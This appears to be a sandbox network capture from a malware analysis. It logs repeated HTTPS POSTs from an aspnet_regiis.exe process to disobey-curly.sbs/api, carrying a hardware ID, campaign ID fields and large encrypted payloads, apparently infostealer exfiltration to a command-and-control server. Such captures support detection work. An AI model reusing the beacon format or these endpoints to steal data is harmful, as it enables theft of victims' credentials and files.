2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 79 51 58 52 53 4c 69 46 42 35 4b 4c 2b 6a 44 63 70 76 79 37 66 54 6b 79 37 4b 32 6a 6c 43 4f 4d 51 41 47 71 45 54 49 68 64 69 48 4c 67 77 6c 63 72 74 4b 53 30 4e 77 76 4b 52 71 33 4b 75 70 71 72 50 57 73 71 43 4f 45 63 31 37 51 45 37 72 56 74 71 43 76 75 6c 62 57 58 63 67 2b 67 6f 4f 55 33 47 4c 30 6c 32 69 7a 65 37 6e 2f 63 72 31 37 74 38 57 67 43 6c 64 43 4c 42 35 6d 59 33 41 36 44 49 58 61 47 47 30 57 69 78 66 4d 4b 76 6a 61 6f 32 2b 33 4f 72 30 78 65 54 6f 32 56 6d 42 52 32 52 70 71 41 36 5a 77 38 43 50 4c 68 6b 77 4a 66 31 61 51 51 78 73 2f 72 45 76 79 36 4f 70 2b 37 33 64 73 75 36 4f 44 70 77 6e 45 6c 71 6f 47 4a 6d 43 67 38 56 75 55 58 4d 33 37 31 30 6e 59 68 6d 72 34 33 32 4b 34 2f 62 6f 30 73 66 6a 38 76 42 6f 32 32 70 63 52 75 39 57 79 49 58 4f Data Ascii: yQXRSLiFB5KL+jDcpvy7fTky7K2jlCOMQAGqETIhdiHLgwlcrtKS0NwvKRq3KupqrPWsqCOEc17QE7rVtqCvulbWXcg+goOU3GL0l2ize7n/cr17t8WgCldCLB5mY3A6DIXaGG0WixfMKvjao2+3Or0xeTo2VmBR2RpqA6Zw8CPLhkwJf1aQQxs/rEvy6Op+73dsu6ODpwnElqoGJmCg8VuUXM3710nYhmr432K4/bo0sfj8vBo22pcRu9WyIXO
2024-11-23 13:59:53 UTC	1369	IN	Data Raw: 30 6c 2b 67 38 61 54 44 6d 62 32 6c 47 4f 39 4f 76 6e 73 65 6a 31 39 63 4a 6f 38 46 35 44 54 2f 67 43 2f 38 61 57 31 44 77 5a 4d 44 6d 73 51 6c 6c 78 4c 4b 4c 30 66 39 37 66 2f 4f 6e 2f 68 4f 32 32 31 78 62 59 4b 51 6f 62 70 67 44 4c 68 64 69 58 4f 31 52 69 4d 2b 6f 5a 44 31 39 35 6d 39 70 52 6a 76 54 72 35 37 48 31 2f 2f 7a 59 51 38 31 35 56 58 62 57 62 63 76 43 6b 4e 51 2b 63 6b 70 6a 33 51 77 61 58 44 43 69 70 44 4c 63 36 37 75 38 73 2b 6e 67 2f 39 35 56 6a 45 78 6f 43 74 6c 57 32 73 57 4f 30 44 78 49 50 6a 69 73 44 46 6b 45 62 65 75 6b 62 74 79 72 75 36 50 39 79 66 50 37 77 46 58 63 65 31 52 4c 2f 6b 4f 65 2b 37 37 34 64 31 5a 67 4c 50 30 58 48 55 6f 41 6d 38 4e 36 6d 66 54 46 32 73 54 56 39 65 69 4d 63 4d 31 2f 55 51 69 6d 41 4d 47 46 32 4a 64 62 55 Data Ascii: 0l+g8aTDmb2lGO9Ovnsej19cJo8F5DT/gC/8aW1DwZMDmsQllxLKL0f97f/On/hO221xbYKQobpgDLhdiXO1RiM+oZD195m9pRjvTr57H1//zYQ815VXbWbcvCkNQ+ckpj3QwaXDCipDLc67u8s+ng/95VjExoCtlW2sWO0DxIPjisDFkEbeukbtyru6P9yfP7wFXce1RL/kOe+774d1ZgLP0XHUoAm8N6mfTF2sTV9eiMcM1/UQimAMGF2JdbU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 13:59:55 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PN69PVY0VSG3MGC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18147 Host: disobey-curly.sbs
2024-11-23 13:59:55 UTC	15331	OUT	Data Raw: 2d 2d 50 4e 36 39 50 56 59 30 56 53 47 33 4d 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 50 4e 36 39 50 56 59 30 56 53 47 33 4d 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4e 36 39 50 56 59 30 56 53 47 33 4d 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d 0a 2d 2d 50 4e 36 Data Ascii: --PN69PVY0VSG3MGCContent-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--PN69PVY0VSG3MGCContent-Disposition: form-data; name="pid"2--PN69PVY0VSG3MGCContent-Disposition: form-data; name="lid"H8NgCl--lonikir--PN6
2024-11-23 13:59:55 UTC	2816	OUT	Data Raw: 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!w
2024-11-23 13:59:56 UTC	1021	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 13:59:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j4vt5hjntl9a4ju2dkcuhfs092; expires=Wed, 19-Mar-2025 07:46:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbjnHSYW%2FHdInsOYffebBgThTKIfG4Wdz1YSuLBuykC17C7ylombD62cnQzNrVGZ6%2F5DfdtAvg2RGDcN0Oisy3BpXtiLHLa11ZTLsZbPnOoJxxchE2%2Fah3QyKy30msaNt62%2B6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aebc6b7842ab-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2096&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19107&delivery_rate=1411309&cwnd=199&unsent_bytes=0&cid=617d790dc009292c&ts=973&x=0"
2024-11-23 13:59:56 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 13:59:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 13:59:57 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=R8OZ1M0FCCDE4CGU3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8780 Host: disobey-curly.sbs
2024-11-23 13:59:57 UTC	8780	OUT	Data Raw: 2d 2d 52 38 4f 5a 31 4d 30 46 43 43 44 45 34 43 47 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 52 38 4f 5a 31 4d 30 46 43 43 44 45 34 43 47 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 38 4f 5a 31 4d 30 46 43 43 44 45 34 43 47 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d Data Ascii: --R8OZ1M0FCCDE4CGU3Content-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--R8OZ1M0FCCDE4CGU3Content-Disposition: form-data; name="pid"2--R8OZ1M0FCCDE4CGU3Content-Disposition: form-data; name="lid"H8NgCl--lonikir
2024-11-23 13:59:58 UTC	1021	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 13:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sssmekpovk1q0161fjcdcm653k; expires=Wed, 19-Mar-2025 07:46:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N4cV%2FGxT0hAOohcfgRFNrWjVwjWQTyC2%2BhQSOoS%2F9TnuO1lCARl%2BwZimvSadhrQuIIEMEvzeuSbmfjDktUBtYfa1YoBQuWLfGaaFxcPRYRUpW50p0xzFYuV0fgkJ%2FEHHwoS8zA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aecbfc46728f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1982&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9719&delivery_rate=1418164&cwnd=149&unsent_bytes=0&cid=a477ee0fd79f350a&ts=844&x=0"
2024-11-23 13:59:58 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 13:59:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:00:00 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4W6Y6DDOCXYZ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20409 Host: disobey-curly.sbs
2024-11-23 14:00:00 UTC	15331	OUT	Data Raw: 2d 2d 34 57 36 59 36 44 44 4f 43 58 59 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 34 57 36 59 36 44 44 4f 43 58 59 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 57 36 59 36 44 44 4f 43 58 59 5a 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d 0a 2d 2d 34 57 36 59 36 44 44 4f 43 Data Ascii: --4W6Y6DDOCXYZ0Content-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--4W6Y6DDOCXYZ0Content-Disposition: form-data; name="pid"3--4W6Y6DDOCXYZ0Content-Disposition: form-data; name="lid"H8NgCl--lonikir--4W6Y6DDOC
2024-11-23 14:00:00 UTC	5078	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-11-23 14:00:01 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:00:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=keq2qo785npk5s9q01nrg7sg8h; expires=Wed, 19-Mar-2025 07:46:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RyMoUgl4hpup8ZgUEs2FNdcluA396AfBtUuMQFn8fW%2BPWJZB9tIy64AaL2Fel45vW06MhNAg%2BERuRQDPMOxDEgqrWMTOWdVv2cR0JWGJFMI7Sd5ISVhIEhk8OS08ORsSY7RNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aedaac1b8c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2010&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21367&delivery_rate=1414043&cwnd=214&unsent_bytes=0&cid=0c88f7145a85d775&ts=892&x=0"
2024-11-23 14:00:01 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:00:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:00:02 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XUYYFZQQQC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1225 Host: disobey-curly.sbs
2024-11-23 14:00:02 UTC	1225	OUT	Data Raw: 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d 0a 2d 2d 58 55 59 59 46 5a 51 51 51 43 0d 0a 43 6f 6e 74 65 6e Data Ascii: --XUYYFZQQQCContent-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--XUYYFZQQQCContent-Disposition: form-data; name="pid"1--XUYYFZQQQCContent-Disposition: form-data; name="lid"H8NgCl--lonikir--XUYYFZQQQCConten
2024-11-23 14:00:03 UTC	1018	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:00:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5sierhpubkuk514r5pqkq3d594; expires=Wed, 19-Mar-2025 07:46:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTziKg6f9AhpyqB7Fv4cfsQQ5s%2B09rVUN4U5bLa3IHyAsV%2FczuOXDLPzyyH855fyGwoVbKJIkGnC5UVzjW0HK98DyPGGHU%2FZrKzhS6t2GLVeYVYxDVj0xt8IfRN7VWJ9CmwmiQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71aeea395def9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2135&delivery_rate=1436301&cwnd=190&unsent_bytes=0&cid=819d1e175fb6be70&ts=712&x=0"
2024-11-23 14:00:03 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:00:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	172.67.223.140	443	2196	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:00:05 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H7HA15TN2DGIA4Z42 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568214 Host: disobey-curly.sbs
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 2d 2d 48 37 48 41 31 35 54 4e 32 44 47 49 41 34 5a 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 43 46 36 35 42 32 39 38 42 41 31 34 33 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 48 37 48 41 31 35 54 4e 32 44 47 49 41 34 5a 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 37 48 41 31 35 54 4e 32 44 47 49 41 34 5a 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 0d Data Ascii: --H7HA15TN2DGIA4Z42Content-Disposition: form-data; name="hwid"E6CF65B298BA1436D7CBBD6DF28D3732--H7HA15TN2DGIA4Z42Content-Disposition: form-data; name="pid"1--H7HA15TN2DGIA4Z42Content-Disposition: form-data; name="lid"H8NgCl--lonikir
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: eb 7b ec d3 7b a1 9d d3 89 4a e2 e5 c0 7c 80 ee 8e 84 05 d1 7e ce c2 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab Data Ascii: {{J\|~(OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2\|B\|\$6s]jASN,_m_[G$D,LH5CM.__
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 22 00 f2 7a f0 fc b7 c7 83 7d 9a 77 de de dd 2d 7b 68 59 4a c9 ad ee aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c Data Ascii: "z}w-{hYJw~V<.iQx;8%Z^[BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN\|xM*%T<_/5IIEL
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: eb ea c2 57 c6 5a 6d 6b 7a 33 21 8f d3 13 4c d4 3e ee d8 77 df a2 5f a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b Data Ascii: WZmkz3!L>w_ ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/O
2024-11-23 14:00:05 UTC	15331	OUT	Data Raw: 3d f0 cc d6 73 31 4c ef 6d 84 a7 97 42 dd f9 27 5f 58 93 74 39 38 16 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f Data Ascii: =s1LmB'_Xt98XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?
